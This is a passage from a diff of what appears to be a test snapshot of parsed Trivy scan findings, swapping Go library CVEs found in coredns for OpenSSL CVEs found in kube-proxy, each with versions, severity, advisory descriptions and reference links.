"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", + "value": "https://avd.aquasec.com/nvd/cve-2021-4160", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-1796.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-4160", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://go-review.googlesource.com/c/crypto/+/278852", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", }, { "type": "URL", - "value": "https://go.dev/cl/278852", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-29652.html", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1796.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + "value": "https://www.openssl.org/news/secadv/20220128.txt", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0227", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-29652", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://go.dev/cl/368814/", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://go.dev/issues/49932", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", - ], - }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://www.openssl.org/news/secadv/20220705.txt", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "timing attack in RSA Decryption implementation", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-33194", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33194", - "https://github.com/advisories/GHSA-83g2-8m93-v3w7", - "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", - "https://go.dev/cl/311090", - "https://go.dev/issue/46288", - "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", - "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", - "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", - "https://pkg.go.dev/vuln/GO-2021-0238", - "https://www.cve.org/CVERecord?id=CVE-2021-33194", - ], - }, - "category": "Vulnerability", - "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "golang: x/net/html: infinite loop in ParseFragment", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://go.dev/cl/311090", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://go.dev/issue/46288", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0238", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33194", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", - ], - }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": 